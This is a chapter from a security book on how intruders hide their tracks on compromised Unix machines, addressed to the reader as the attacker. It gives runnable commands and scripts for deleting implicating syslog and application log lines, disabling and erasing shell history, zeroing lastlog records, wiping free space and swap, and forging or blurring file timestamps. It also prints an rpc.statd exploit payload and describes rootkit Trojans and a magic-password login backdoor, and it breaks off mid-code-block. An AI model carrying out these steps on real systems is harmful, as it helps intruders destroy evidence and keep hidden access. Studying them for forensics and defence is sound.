Chapter 10. Hiding the Tracks

This chapter deals with hiding your tracks, or not leaving any in the first place (the latter is rarely possible). Specifically, we show how crackers sweep away the evidence of a break-in. We cover the topics of erasing audit records, attempting to defeat forensics, and creating basic covert channels[1] over the network. Also, we show how crackers can come back to an “owned” machine with confidence that it stays owned by them.

From Whom Are You Hiding?

Before planning how to hide your tracks, you must first ask a simple question: from whom are you hiding? Is the target a home user who just bought his first Linux machine at WalMart? His computer will be deployed with all of the default services on and no access control, apart from the password for the mighty “root” user. Or are you up against the paranoid hackers at the local security consultancy, who write secure Unix kernel modules before breakfast and know the location of every bit on their hard drives? Or, the worst-case scenario, is the opponent a powerful government entity armed with special-purpose hardware (such as magnetic force scanning tunneling microscopy, as mentioned in Peter Gutmann’s seminal paper—see Section 10.5 for more information) and familiar with the latest nonpublic data recovery techniques? The relevant tips and tricks are completely different in each of these cases.

Sometimes, hiding does not work, no matter how hard you try; in this case, it’s better to do your thing, clean up, and leave without looking back. This book cannot help you with that. Instead, this chapter aims to provide a general overview of most known hiding methods.

Unless otherwise noted, most of these tips are applicable to a not-too-skilled cracker (from now on referred to as an “attacker”) hiding from a not-too-skilled system administrator (the “defender”), sometimes armed with commercial off-the-shelf or free open source computer forensic tools. In some cases, we will escalate the scenario—for example, in situations where these things happen:

  1. Attacker: logfiles erased and evidence gone

  2. Defender: erased files recovered using standard forensic tools

  3. Attacker: logfiles erased and overwritten with zeros

  4. Defender: parts of logfile survive due to OS peculiarities and are recovered

  5. Attacker: logfiles erased and completely overwritten with zeros

  6. Defender: parts of logfile are found during swap file analysis

  7. Attacker: logfiles erased and completely overwritten with zeros, swap file sanitized, memory dump sanitized, free and slack space sanitized

  8. Defender: data recovered using special hardware

  9. Attacker: logfiles erased using methods aimed to foil the above hardware

  10. Defender: files recovered using the yet-undisclosed novel forensic technique

Obviously, a real situation usually breaks at one of the steps of the above escalation scenario. Thus, we will not go into every possible permutation. The reader might rightfully ask, “What about such-and-such tool? Won’t it uncover the evidence?” Maybe. But if its use is unlikely in most situations, we won’t discuss it here.

We start with hiding your tracks immediately after an attack. Then, we proceed to finding and cleaning logfiles, followed by a section about antiforensics and secure data deletion. Finally, we touch on IDS evasion and provide an analysis of rootkit technology.

Postattack Cleanup

The first step after an attack (exploiting the machine and making sure you can access it later) is cleaning up. What needs to be hidden or at least swept under the rug, on a typical Unix machine being exploited over the network via a remote hole? Here is a short checklist.

System Logs

As described in previous chapters, Unix systems log to a set of plain-text logfiles via the syslog daemon. Depending upon how the machine was exploited, its platform (Solaris, FreeBSD, Linux, etc.), and the level of logging that was enabled, there might be evidence of the following events.

The exploit attempt itself

Consider, for example, this tell-tale sign of a Linux RPC hit:

Oct 19 05:27:43 ns1 rpc.statd[560]: gethostbyname error for 
^X ÿ¿^X ÿ¿^Z ÿ¿^Z ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%62716x%hn%51859x%hn220220220220
220220220220220220220220220220220220220220220220220220220220220
220220220220220220220220220220220220220220220220220220220220220
220220220220220220220220220220220220220220220220220220220220220
220220220220220220220220220220220220220220220220220220220220220
220220220220220220220220220220220220220220220220220220220220220
220220220220220220220220220220220220220220220220220220220220220
220220220220220220220220220220220220220220220220220220220220220
220220220220220220220220220220220220220220220220220220220220220
220220220220220220220220220220220220220220220220220220220220220
220220220220220220220220220220220220220220220220220220220220220
220220220220220220220220220220220

The above attack was very common in 2000-2001 and still surfaces in the wild reasonably often. The attacker aims to overflow the buffer in the rpc.statd daemon (part of Unix RPC services) on Linux in order to gain root access. While both successful and failed attacks register in the logs as shown above, the example log signature was generated on a nonvulnerable server.

The attacker’s accesses before the exploit

Did you snoop around that FTP server before exploiting it? If so, look for the following and clean it up:

Oct 15 19:31:51 ns3 ftpd[24611]: ANONYMOUS FTP LOGIN FROM 218.30.21.182 [218.30.21.
182], hehehe@
Oct 15 19:33:16 ns3 ftpd[24611]: FTP session closed

The attacker had to log in to the FTP server in order to launch a privilege escalation attack, which required local privileges. Thus, an access record similar to the above will appear in the logfile, right before the attack.

Erasing logfiles

System logs include more than the obvious /var/log/messages or /var/adm/syslog. Make sure you also look through all of the /var/log directories for signs of your IP address or hostname. In fact, it makes sense to look at /etc/syslog.conf to confirm what is being logged and where.
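This sweep can be scripted. The sketch below builds a scratch syslog.conf and logfile so it can run anywhere; on a real system, conf would point at /etc/syslog.conf, and the address would be whatever host you connected from (all names and entries here are stand-ins):

```shell
# Build a sample syslog.conf and logfile so the sketch is self-contained;
# on a real system you would point conf= at /etc/syslog.conf directly.
work=$(mktemp -d)
conf=$work/syslog.conf
printf '%s\n' '# comment' 'authpriv.* /var/log/secure' \
    "*.info $work/messages" '*.emerg *' > "$conf"
echo 'Oct 15 19:31:51 ns3 ftpd[24611]: LOGIN FROM 218.30.21.182' > "$work/messages"

addr="218.30.21.182"   # the address to sweep for (placeholder)
# The second field of each non-comment line names the log destination;
# keep only plain file paths, then grep each one for the address.
hits=""
for f in $(awk '!/^#/ && NF >= 2 && $2 ~ /^\// { print $2 }' "$conf" | sort -u); do
    if [ -f "$f" ] && grep -q "$addr" "$f" 2>/dev/null; then
        hits="$hits $f"
    fi
done
echo "tainted:$hits"
```

Every file the loop reports would then need the cleaning treatment described below.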

Sometimes, a devious system administrator might rebuild the syslog daemon so that it does not read the usual configuration file (/etc/syslog.conf) but instead uses a covert configuration file (or both). In this case, snooping around can reveal the location of those alternative logs. Killing the syslog daemon (as performed by most modern Unix rootkits upon installation) is a good common-sense “security” measure; that is, it adds security to covert access of a target system. However, if the exploit attempt itself is logged to a remote log server, it is too late to kill the daemon: the telltale signs are already recorded in the safe location.

Cleaning plain-text logs does not require any sophisticated tools. A text editor, right down to command line-based sed or awk, will do. Table 10-1 lists the available options in more detail, in order of increasing detection difficulty.

Table 10-1. Logfile cleansing actions and countermeasures

Attacker action: Logfiles erased
Defense countermeasures: Highly visible; at least some parts might be unerased using raw access to the filesystem, unerase tools (where available), or simple forensic tools

Attacker action: Logfiles wiped (zeroed on disk)
Defense countermeasures: Highly visible; traces might still be found in swap

Attacker action: Logfiles edited and saved
Defense countermeasures: Not very visible (unless a large time period is absent from a logfile); parts might be unerased using raw access to the filesystem, unerase tools (where available), or simple forensic tools

Attacker action: Logfiles edited and the removed parts zeroed on disk
Defense countermeasures: Not very visible (unless a large time period is absent from a logfile); likely cannot be unerased if the wiping routine works as advertised

In real life, the most common scenario involves either the deletion or editing of logfiles without any additional effort on the attacker’s part. Often, the filesystem implementation is somewhat on the attacker’s side, and parts of the removed content are simply overwritten on disk by the subsequent disk activity.
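Such an edit can be as simple as a sed one-liner. The fragment below is a sketch against a scratch copy of a messages file (the address and entries are placeholders); writing the cleaned contents back with cat, rather than renaming a new file into place with mv, keeps the logfile's original inode:

```shell
# Scratch "messages" file standing in for /var/log/messages.
log=$(mktemp)
cat > "$log" <<'EOF'
Oct 15 19:30:01 ns3 CRON[24580]: (root) CMD (run-parts /etc/cron.hourly)
Oct 15 19:31:51 ns3 ftpd[24611]: ANONYMOUS FTP LOGIN FROM 218.30.21.182
Oct 15 19:33:16 ns3 ftpd[24611]: FTP session closed
EOF
addr="218.30.21.182"                  # the implicating address (placeholder)
# Drop every line mentioning the address, then put the cleaned copy back.
sed "/$addr/d" "$log" > "$log.clean"
cat "$log.clean" > "$log"             # overwrite in place; the inode is kept
rm -f "$log.clean"
```

As Table 10-1 notes, the deleted lines still sit in the freed disk blocks until something overwrites them.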

Application Logs

Depending upon the location of the entry into the system, various application logs might contain evidence of sudden conquest, preliminary probing, and subsequent system accesses. The simplest example is an FTP log (usually located with other system logs) or web server log (for the case of Apache, usually stored in /var/log/httpd). Here is an example of a recent SSL worm exploit hit in the Apache logfile:

[Thu Nov 21 08:04:36 2002] [error] mod_ssl: SSL handshake failed (server ns1.
bkwconsulting.com:443, client 24.199.239.142) (OpenSSL library error follows)

[Thu Nov 21 08:04:36 2002] [error] OpenSSL: error:1406908F:lib(20):func(105):
reason(143)

[Thu Nov 21 08:04:37 2002] [notice] child pid 11175 exit signal Segmentation fault (11)

The above signature was left on a vulnerable Red Hat Linux machine (a “honeypot”) exploited by the SSL worm.

This evidence should be cleaned up much like standard Unix logs: simply remove any “suspicious” entries. Since the logs are text files on a disk, the above discussion about evidence removal applies here as well. Overall, if the files are not reliably zeroed out on the disk, there is a chance that the investigators might recover some parts or even the whole log.

Unix Shell History

Another critical source of evidence is the Unix shell history. By default, most shells, such as sh (standard on Free/OpenBSD), bash (common on Linux distributions), csh (common on Sun Solaris machines), and tcsh (a modern incarnation of the C shell), save all executed commands to a history file (e.g., .bash_history or .history). These files must be cleaned after a break-in. Note that bash writes the session’s history only upon session exit: recording of the command line starts when the user logs in and the shell session begins, and the typed commands are flushed to the history file when the user logs out or disconnects. Thus, erasing the history file during the session removes only old data, not the commands of the currently running session.

Here is an example of a real-life bash shell session history left by a careless attacker on a honeypot:

cd luckroot
ls
./luckgo
./luckgo 66 22
./luckgo 212 22
cd /blacki
ls
rm -rf luck.tar.
clear
uptime
cd dos
./vadimI 10.10.10.10
./vadimI 10.11.12.13

The commands indicate that an attacker did a fair bit of exploit scanning (using the classic “luck” exploit scanner). He scanned two B-classes (around 128,000 IP addresses). Then he cleaned up some files (rm) and proceeded to “DoS the shiznat” out of his enemies using the antiquated but still deadly (for people with slow connections) UDP flooder “vadim”.

It should be noted that even if the attacker’s rootkit had removed those lines and disabled the bash history, the covert bash monitoring software installed on the honeypot would still have recorded the commands and sent them off the system for analysis. Thus, the tips outlined below would not have helped here.

Overall, dealing with shell history involves two actions:

  • Preventing its generation

  • Removing existing history

Table 10-2 is a summary of the above actions for commonly used Unix shells.

Table 10-2. Attacker cleanup on Unix shells

Shell: bash (Linux)
History prevention: export HISTSIZE=0; export HISTFILE=/dev/null
History cleanup: export HISTSIZE=0; rm ~/.bash_history

Shell: tcsh (Linux)
History prevention: set histfile=/dev/null; set savehist=0
History cleanup: rm ~/.history

Shell: csh (Solaris)
History prevention: set history=0
History cleanup: rm ~/.history

Shell: ksh (Solaris)
History prevention: export HISTFILE=/dev/null; export HISTSIZE=0
History cleanup: rm ~/.sh_history

Keep in mind that a shell might save the history file after the session is ended; thus, all manipulations of the history file should be done after the session is closed and a new one is opened. It might be wise to set the history file to /dev/null, then log out and erase the old one. Taking these steps assures that a new history is not generated.
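For bash, the whole cleanup collapses into a few commands run inside the session. This is a sketch: the scratch HOME keeps the demo harmless, whereas on a real target these commands operate against the actual home directory. history -c additionally empties the in-memory list, which would otherwise be flushed back to disk at exit:

```shell
# Scratch HOME so the sketch is safe to run anywhere; on a real target
# these commands run against the actual home directory.
HOME=$(mktemp -d)
touch "$HOME/.bash_history"       # stand-in for previously recorded history
export HISTFILE=/dev/null         # this session's history goes nowhere
export HISTSIZE=0
history -c 2>/dev/null || true    # drop the in-memory list (bash builtin;
                                  # a harmless no-op in plain sh)
rm -f "$HOME/.bash_history"       # erase what earlier sessions wrote
```

The order matters: redirect HISTFILE first, so that even an unexpected disconnect has nowhere to write the session's commands.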

Again, since history files are plain-text files located on a disk, the arguments from Table 10-1 apply. Erasing the files might hide them from some investigators, but those with forensic tools have an excellent chance of uncovering them. If higher “security” is desired, the files should be wiped by a wiping tool (simple) or edited with removed parts wiped from the disk (more complex).

Unix Binary Logs

As we will discuss in Chapter 18, Unix systems produce several kinds of binary logs. These are divided into process audit records and login records. The former need to be enabled on most Unix systems, while the latter are always generated. Many hacker tools are written to “sanitize” login records, which means covertly removing undesirable, implicating records. Common examples of such tools are zap, clear, and cloak.

These tools operate in two distinct ways: they either zero out/replace the binary log records (stuffing the file with zero records, which is suspicious) or they erase them (making the logfile shorter, which is also suspicious). Both methods have shortcomings, and both can be detected.

Here is how the zap tool zeros out login records in /usr/adm/lastlog on Solaris:

if ((f = open("/usr/adm/lastlog", O_RDWR)) >= 0) {
    lseek(f, (long)pwd->pw_uid * sizeof(struct lastlog), 0);
    bzero((char *)&newll, sizeof(newll));
    write(f, (char *)&newll, sizeof(newll));
    close(f);
}

Note the calls to bzero and write, which do the trick. This code excerpt is quoted from http://spisa.act.uji.es/spi/progs/codigo/ftp.technotronic.com/unix/log-tools/zap.c.
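The effect of that C fragment can be approximated from the shell with dd: seek to uid * sizeof(struct lastlog) and overwrite one record with zeros. In this sketch a scratch file stands in for /usr/adm/lastlog, and the 292-byte record size is purely illustrative (the real size is platform-dependent):

```shell
# Fake lastlog: 4 records of 292 bytes each, filled with 'A' so the
# overwrite is visible. 292 is an illustrative sizeof(struct lastlog).
recsize=292
lastlog=$(mktemp)
dd if=/dev/zero bs=$recsize count=4 2>/dev/null | tr '\000' 'A' > "$lastlog"

uid=2                              # zero out the record of uid 2 (example)
dd if=/dev/zero of="$lastlog" bs=1 \
   seek=$((uid * recsize)) count=$recsize conv=notrunc 2>/dev/null
# Count the 'A's left: three untouched records' worth should remain.
remaining=$(tr -cd 'A' < "$lastlog" | wc -c)
```

Because conv=notrunc leaves the file length unchanged, the log does not shrink, which is exactly why this style of zeroing is less conspicuous than truncation (though the zeroed slot itself is still suspicious).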

Here is how the cloak tool accomplishes the same goal:

lseek(fd, size*getuid(  ), SEEK_SET);
read(fd, &l, size);
l.ll_time = 0;
strncpy(l.ll_line, "ttyq2 ", 5);
gethostname(l.ll_host, 16);
lseek(fd, size*getuid(  ), SEEK_SET);

Notice the use of read and strncpy. This example is quoted from http://spisa.act.uji.es/spi/progs/codigo/ftp.technotronic.com/unix/log-tools/cloak.c.

A nice tutorial on how such tools work is available at http://packetstormsecurity.nl/Unix/penetration/log-wipers/lastlog.txt. This tutorial covers the design and implementation of one log cleaner, with full commented source code in C.

Other tools sometimes can replace the telltale records with supposedly innocent information, but it’s easily discovered if a defender knows what to look for.

Overall, few of the tools commonly seen in the wild actually make an effort to make erased logs harder to recover, in part because the disk area where logs are stored has a high chance of being overwritten. In fact, it might be easier to erase the records and then generate a lot of innocent-looking log data in order to flush the disk with it. One log-erasing tool is shroud (http://packetstormsecurity.nl/Unix/penetration/log-wipers/shroud-1.30.tgz). It erases various logs and uses one of the reliable deletion programs (van Hauser’s srm) to try to destroy them on disk. Similarly, tools exist that clean process audit records (e.g., acct-cleaner).

Here is an example of some malicious activity recorded by Unix process audit:

crack           badhacker    stdin     99.90 secs Wed Nov 20 20:59

It shows that an attacker used the password-cracking crack tool to break passwords. Obviously, if the tool had been renamed, the process audit records would not have shown any mischief.

Other Records

Other records might also be generated on the system. Here is a trick to find them; it should be done as “root” (root access is needed anyway to “correct” the audit records of your presence).

Upon login, create a file using touch /tmp/flag. Then, right before you are about to leave the machine, run find ~ -newer /tmp/flag -print. This command shows files that have changed since your login.

To dig deeper and look for files changed right before the login, mark the time that your session started and run find ~ -mmin -5 -print (for files changed within the last five minutes). These tips are from van Hauser’s “HOW TO COVER YOUR TRACKS” guide, available online. Unix systems keep track of timestamps by default; thus, these commands are almost guaranteed to work.
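Both tricks can be tried safely against a scratch directory (mktemp stands in for the home directory, and the flag is backdated so the comparison does not trip over same-second timestamp granularity):

```shell
home=$(mktemp -d)                    # stand-in for the account's home
flag=$home/flag                      # the "touch /tmp/flag" step at login
touch -d '2000-01-01 00:00' "$flag"  # backdated so later changes compare newer
echo x > "$home/dropped_tool"        # hypothetical activity during the session
# Everything modified since "login":
changed=$(find "$home" -newer "$flag" -print | grep -c dropped_tool)
# Everything modified within the last five minutes (note the minus sign):
recent=$(find "$home" -mmin -5 -print | grep -c dropped_tool)
```

Both counts come back as 1 here: the dropped file shows up in each listing.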

Forensic Tracks

Now that you are reasonably sure[2] that there are no traces of your attack in the logfiles, it is time to take concealment to the next level.

File Traces

Even if you are sure that the OS audit trail is clear, the shell histories, source files, and logfiles you erased and even your keystrokes might hide in many places on the system. The vigor with which you pursue these traces depends on what’s at stake as well as the skill of your adversaries. Uncovering erased data is simple on Windows and only slightly more difficult on Unix filesystems. However, you can be sure that there is always a chance that a file subjected to the wrath of /bin/rm will come to life again (as a zombie). The research (such as the famous paper “Secure Deletion of Data from Magnetic and Solid-State Memory,” by Peter Gutmann) indicates that there is always a chance that data can be recovered, even if it has been overwritten many times. Many tools are written to “securely erase” or “wipe” the data from a hard drive, but nothing is flawless. However, these tools have a chance of foiling a forensics investigation. In fact, there are even tools “marketed” (in the underground) as antiforensics. An example is the notorious Defiler’s Toolkit, described in Phrack #59 (file #0x06, “Defeating Forensic Analysis on Unix”). It’s rarely used and is usually overkill, but the kit demonstrates that advanced hackers may easily make forensics investigation onerous or even impossible. In fact, the author of the paper laments the poor state of computer forensics and the lack of advanced data discovery tools.

One of the main issues with secure deletion of data is that the filesystem works against the attacking side (which attempts to hide or remove data) and the defending side (which seeks to uncover the evidence). Often, Unix filesystems overwrite the drive area where the removed files were located (this is especially likely to happen to logfiles). On the other hand, the filesystem has an eerie tendency to keep bits and pieces of files where they can be found (swap, /tmp area, etc.). Overall, reliably removing everything beyond recovery is just as difficult as reliably recovering everything.

There are a lot of Unix tools that claim to reliably erase data. However, many of them use operating system disk-access methods that tend to change, since OS authors do not have to be concerned about preserving low-level access to the disk—it goes unused by most applications. Such changes have a good chance of rendering a wiping tool ineffective. Thus, unlike other application software, a wiping tool that performs just fine on Red Hat Linux 7.1 might stop working for 7.2.

The simpler, more reliable way of erasing all host traces (without destroying the drive) requires your presence at the console. For example, the autoclave bootable floppy system (http://staff.washington.edu/jdlarios/autoclave/) allows you to remove all traces of data from the IDE hard disk (SCSI is not supported). In fact, it removes all traces of just about everything and leaves the disk completely filled with zeros or random patterns.

Unlike the programs that run from a regular Unix shell (such as many incarnations of wipe and shred), autoclave has its own Linux kernel and wiping utility that ensures erased means gone. In this case, you can be sure the filesystem or OS does not play any tricks by inadvertently stashing bits of data somewhere. However, autoclave is not useful for remote attackers, since inserting a floppy into the machine might be problematic and removing everything with 38 specially crafted character passes, while extremely (in all senses extremely) effective, might bring attention to an otherwise inconspicuous incident. The process is also painfully slow and might take days for a reasonably large hard drive. A single “zero out” pass takes at least 3 hours on a 20-GB drive with modern disk controllers. Many similar mini-OS bundles exist for reliably cleaning the disks.

Thus, in real life, under time pressure, you must rely on application-level deletion tools that use whatever disk access methods the OS provides and sometimes miss data. Even the best wiping tools (including those with their own kernels, such as autoclave) are not guaranteed against novel and clandestine forensics approaches that involve expensive custom hardware.

Here is an example of using GNU shred, the secure deletion utility that became standard on many Linux and *BSD distributions:

#shred -zu ~/.bash_history

This command erases the above shell history file with 25 overwrite cycles, inspired by Gutmann’s paper. Or, rather, it tries to erase the file. However, the user will likely have no idea whether it was erased or not. Many things can get in the way: filesystem code, caches, and so on. While the tool authors do take care to make sure that the erased bits are really erased, many factors beyond their control can intervene. For example, even if shred works for you with the ext2 filesystem on Linux, you still need to test it to know whether it works on ext3 or ReiserFS. As pointed out by one wiping tool’s author (http://wipe.sourceforge.net), “if you’re using LFS[3] or something like it, the only way to wipe the file’s previous contents (from userspace) is to wipe the whole partition...”

You can test the behavior of your wiping tool on your specific system with the following sequence of commands. They check whether the tool actually wipes the data off the floppy disk:

# mkfs -t ext2 /dev/fd0

Create a fresh Linux ext2 filesystem on a floppy disk.

# mount /mnt/floppy

Mount the floppy to make the created filesystem available.

# dd if=/dev/zero of=/mnt/floppy/oooo ; sync ; /bin/rm /mnt/floppy/oooo ; sync

Zero the disk using the dd command in order to remove prior data.

# echo "some data" > /mnt/floppy/TEST

Create a test file.

# sync

Make sure the file is in fact written to the disk.

# strings /dev/fd0 | grep data

Confirm that the data is indeed written to disk.

# shred -vuz /mnt/floppy/TEST

Remove the file using (in this case) the GNU shred utility.

# umount /mnt/floppy

Unmount the filesystem to make absolutely sure the file is indeed wiped.

# strings /dev/fd0 | grep data

Try to look for the file data on disk (should fail—i.e., nothing should be seen).

You should see nothing in response to the last command. If you see some data, the secure wipe utility fails the test. The GNU shred utility passes it just fine. However, the test is not conclusive, since the floppy often has a different filesystem from the hard drive; thus, the tool might not pass the test for the real hard drive. Additionally, sometimes the drive hardware plays its own games and doesn’t actually write the data, even if synced. In this case, the data might be retained in the drive’s internal memory.

In many cases, even a makeshift solution like this one will help. Suppose you are erasing the file .bash_history from the directory /home/user1. The following commands attempt to make recovery problematic:

#/bin/rm ~user1/.bash_history
# cat /dev/zero > /home/user1/big_file
(until file system overflows and "cat" command exits)
# sync
# /bin/rm /home/user1/big_file

The Unix dd command may be used in place of cat, as in the floppy example above.

The trick is to remove the file and then make the system allocate all the disk space on the same partition for big_file with zeros, just as in our floppy test above. Even though the sync command is supposed to copy all the memory buffers to disk, the operation has a chance of not working due to caches, buffers, and various filesystem and drive firmware idiosyncrasies.

These steps make it more difficult to recover erased data. It makes sense to deal similarly with swap, which can contain pieces of your “secret” data. The procedure for a Linux swap partition (swap can also be a file, which makes cleaning it easier) is straightforward: disable swap, usually with swapoff, and then write data (such as zeros or special characters) over the raw partition, starting from the swap header. The sswap utility from the THC secure_delete kit automates the process, except that turning off swap must still be done manually. The utility handles Linux swap by default and might be able to clean other Unix swap formats as well.
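The manual sequence might look like the following sketch. A scratch file stands in for the swap partition, and the root-only swapoff/mkswap/swapon steps are shown commented out (on a real system, swapdev would be the partition named in /etc/fstab, e.g. /dev/hda2):

```shell
# Scratch file standing in for the swap partition; on a real system
# swapdev would be the actual device and the commented steps would run.
swapdev=$(mktemp)
echo "secret fragment paged out of memory" > "$swapdev"

# swapoff "$swapdev"                 # root only: take the area out of service
size=$(wc -c < "$swapdev")
# Overwrite the whole area with zeros, rounding up to 4 KB blocks.
dd if=/dev/zero of="$swapdev" bs=4096 \
   count=$(( (size + 4095) / 4096 )) conv=notrunc 2>/dev/null
sync
# mkswap "$swapdev" && swapon "$swapdev"   # root only: rebuild and re-enable
```

A single zero pass like this is what sswap automates; multiple passes with varying patterns follow the same structure.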

Placing data on a disk specifically to foil forensic tools sounds like overkill for almost any attack. However, the methods to do so are available (see, for example, “Defeating Forensic Analysis on Unix” in Section 10.5). Certain tools can clean up the filesystem metadata that forensic tools use to uncover evidence. A good example is cleaning inode data on the ext2 Linux filesystem; this data is used by forensic tools (such as TCT and TASK) to find deleted files.

In some cases, even the hardware might revolt against the attacker. Certain disk controllers combine write operations, thus decreasing the number of passes actually applied: the drive controller firmware sees that you are trying to write zeros, say, five times, and writes them just once, assuming that is what you want. Similarly, the OS’s built-in sync command might have no effect on the drive’s internal memory cache, thus also thwarting attempts to wipe the data.

Timestamps

Another critical forensics trace, and one that will always be left on the system, is timestamps. Consumer operating systems such as Windows 9x/Me keep track of changes to files by adjusting the file timestamp; i.e., the modification time. Other OSs record much more.

Most Unix filesystems record not only when the file was changed (modified time, or mtime) and when its properties (such as permissions) were changed (change time, or ctime), but when the file was last accessed for reading (access time, or atime). Together, these timestamps are referred to as MAC times (Modify-Access-Change times).
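On systems with GNU coreutils, all three stamps are visible from the command line with stat (the scratch file here is just for demonstration):

```shell
f=$(mktemp)
echo demo > "$f"
# %X/%Y/%Z print atime/mtime/ctime as Unix epoch seconds (GNU stat syntax).
mac=$(stat -c 'atime=%X mtime=%Y ctime=%Z' "$f")
echo "$mac"
cat "$f" > /dev/null   # a mere read may bump the atime (depends on mount options)
```

This is the same information forensic collectors such as MAC-robber harvest for every file on the system.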

Here is how Linux ext2 stores the times for each inode (filesystem unit in ext2):

struct ext2_inode {
        ...other fields...
        __u32   i_atime;   /* access time - reading */
        __u32   i_ctime;   /* change time - permissions */
        __u32   i_mtime;   /* modification time - contents */
        __u32   i_dtime;   /* deletion time - or 0 for non-deleted files */
        ...other fields...
};

For each inode, four times are stored by the filesystem as 32-bit unsigned integers.

Here is an example excerpt from the MAC-robber tool (by Brian Carrier; see http://www.sleuthkit.org/mac-robber/desc.php), which collects all such timestamps from Unix files. The first line shows the record format; the st_atime, st_mtime, and st_ctime fields are the MAC times.

md5|file|st_dev|st_ino|st_mode|st_ls|st_nlink|st_uid|st_gid|st_rdev|st_size|st_
atime|st_mtime|st_ctime|st_blksize|st_blocks
0|/usr/local/bin|769|48167|16877|drwxr-xr-
x|2|0|0|5632|4096|1057911753|1050935576|1050935576|4096|8
0|/usr/local/bin/a2p|769|48435|33261|-rwxr-xr-
x|1|0|0|2816|107759|0|1018888313|1050509378|4096|224
0|/usr/local/bin/argusarchive|769|48437|33261|-rwxr-xr-
x|1|0|0|2816|3214|1057910715|1022848135|1050509378|4096|8
0|/usr/local/bin/argusbug|769|48438|33133|-r-xr-xr-
x|1|0|0|2816|9328|1057910715|1022848135|1050509378|4096|24
0|/usr/local/bin/c2ph|769|48439|33261|-rwxr-xr-
x|2|0|0|2816|36365|0|1018888313|1050509379|4096|72

The timestamps, such as “1050935576”, are numbers of seconds since January 1, 1970, the standard time notation on Unix systems (“Unix epoch time”). The above number actually stands for Monday, April 21, 2003, 14:32:56 UTC.

Many conversion tools are available (e.g., http://dan.drydog.com/unixdatetime.html or http://www.onlineconversion.com/unix_time.htm). A Google query for “1970 Unix time convert” provides numerous examples.
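On a system with GNU date, the conversion can also be done locally; -u pins the output to UTC, and the value is the one from the listing above:

```shell
# Convert the epoch value from the MAC-robber output to a readable date.
# LC_ALL=C keeps the day/month names in English regardless of locale.
when=$(LC_ALL=C date -u -d @1050935576 '+%a %b %d %H:%M:%S %Y')
echo "$when"
```

The reverse direction works too: `date -u -d '2003-04-21 14:32:56 UTC' +%s` yields the epoch value back.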

The critical issue of timestamps is that collecting them on a running filesystem changes the atime, since the file has to be accessed in order to check the timestamp. That is exactly the reason why forensics manuals recommend working with a read-only copy of the evidence.

For any program running under Unix, many libraries and system files are usually accessed. Thus, a running program leaves a wake of changed atimes behind it. Such changes may be detected. Obviously, any files that were modified will have their mtimes and ctimes updated as well.

Countermeasures

There are two main methods to try to stop these information leaks about your activities on a system. One is to remount the filesystem in such a way that no atime timestamps are collected. It may be accomplished under Linux using the command:

#mount -o noatime,remount /dev/hda1 /usr

This prevents the atime analysis, while doing nothing to ctime and mtime changes. Even more effective is mounting the filesystem as read-only, as follows:

#mount -o ro,remount /dev/hda1 /usr

This effectively prevents all timestamp changes, but it might be impractical if changes to the partition are needed.

Timestamps in Unix can also be changed manually using the touch command; e.g., touch -a /tmp/test changes the atime of the file /tmp/test, while touch -m /tmp/test affects the mtime. The command may also be used to set an arbitrary time on a file and to copy the timestamps from a different file. touch is an effective tool for influencing timestamps. Just keep in mind that running the touch command creates the usual atime wake.
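For instance, -r copies the stamps from a reference file, which is how a dropped Trojan binary can be made to blend in with its untouched neighbors (the file names below are stand-ins in a scratch directory):

```shell
dir=$(mktemp -d)
echo original > "$dir/ls"              # stands in for an untouched system binary
touch -d '2001-06-01 12:00' "$dir/ls"  # give it an old, plausible mtime
echo trojan > "$dir/ps"                # stands in for a freshly dropped Trojan
touch -r "$dir/ls" "$dir/ps"           # copy atime and mtime from the reference
```

After the copy, a casual ls -l of the directory shows two equally “old” files; only the ctime (which touch cannot set) still betrays the newcomer.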

Yet another method is to go ahead and access all the files, so that all timestamps are changed. This can be done via the touch command or other means. For example, you can loop through all the files to touch them and thus distort all accessible timestamps, so that forensic investigators see all files as modified.
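The brute-force variant is a one-liner around find (shown here against a scratch tree; on a real system the target would be / and -xdev keeps find from wandering onto other mounts):

```shell
tree=$(mktemp -d)                      # stand-in for the subtree to blur
mkdir -p "$tree/a"
echo x > "$tree/a/f"
touch -d '1999-01-01' "$tree/a/f"      # an "old" file an investigator would trust
# Reset atime and mtime of everything to now, drowning the real access wake.
find "$tree" -xdev -exec touch -a -m {} + 2>/dev/null
```

Every timestamp in the tree now reads as the same moment, which destroys the atime trail but is itself a loud signal that someone tampered with the system.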

Going to such lengths to thwart host forensics might be futile if the data resides on network devices or other machines. Network devices (such as routers) and security devices (firewalls, IDSs) might still remember you and remain out of your reach.

Maintaining Covert Access

This section deals with rootkits, automated software packages that set up and maintain your environment on a compromised machine. Rootkits occupy an important place in a hacking tool chest. Originally, rootkits were simply tar archives of several popular binaries (likely to be run by system administrators of the compromised machines), along with several other support programs, such as log cleaners. For example, /bin/ps, /bin/login, and /bin/ls were often Trojaned in order to hide files and maintain access. Here is a list of binaries often replaced (from http://www.chkrootkit.org): aliens, asp, bindshell, lkm, rexedcs, sniffer, wted, scalper, slapper, z2, amd, basename, biff, chfn, chsh, cron, date, du, dirname, echo, egrep, env, find, fingerd, gpm, grep, hdparm, su, ifconfig, inetd, inetdconf, identd, killall, ldsopreload, login, ls, lsof, mail, mingetty, netstat, named, passwd, pidof, pop2, pop3, ps, pstree, rpcinfo, rlogind, rshd, slogin, sendmail, sshd, syslogd, tar, tcpd, top, telnetd, timed, traceroute, w, and write.

This list demonstrates that almost nothing is immune from Trojaning by rootkits and also emphasizes that “fixing” after the intrusion is nearly futile. A rebuild is in order.

Unix rootkits were first mentioned in 1994, after being discovered on a SunOS system. However, many tools that later became part of rootkits were known as long ago as 1989. There are three main classes of rootkits available today: binary kits, kernel kits, and library kits. However, rootkits found in the wild often combine Trojaned binaries with the higher “security” provided by the kernel and library components.

Let’s examine some rootkits. After gaining access, an attacker typically downloads the kit from his site or a dead drop box,[4] unpacks it, and runs the installation script. As a result, many system binaries are replaced with Trojaned versions. These Trojans usually serve two distinct purposes: hiding tracks and providing access. The installation script often creates a directory and deploys some of the support tools (log cleaners, etc.) in the new directory. This same directory is often used to store the original system binaries so that they’re available to the attacker. After the kit is installed, the system administrator inadvertently runs Trojaned binaries that will not show the attacker’s files, processes, or network connections. A Trojaned /bin/login (or one of the network daemons) binary provides remote access to a machine based on a “magic” password. This is the style of operation employed by the famous login Trojan, which looked for the value of the $TERM environment variable. If the value matched a hardcoded string, login let the attacker through; if it did not match, control was handed to the original login binary and the authentication process continued as usual.
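The decision logic amounts to a handful of lines. This shell sketch only models the control flow with echoed outcomes; a real kit patches the C source of /bin/login, and the magic value and paths here are invented:

```shell
# Hypothetical trigger value compiled into the Trojaned binary.
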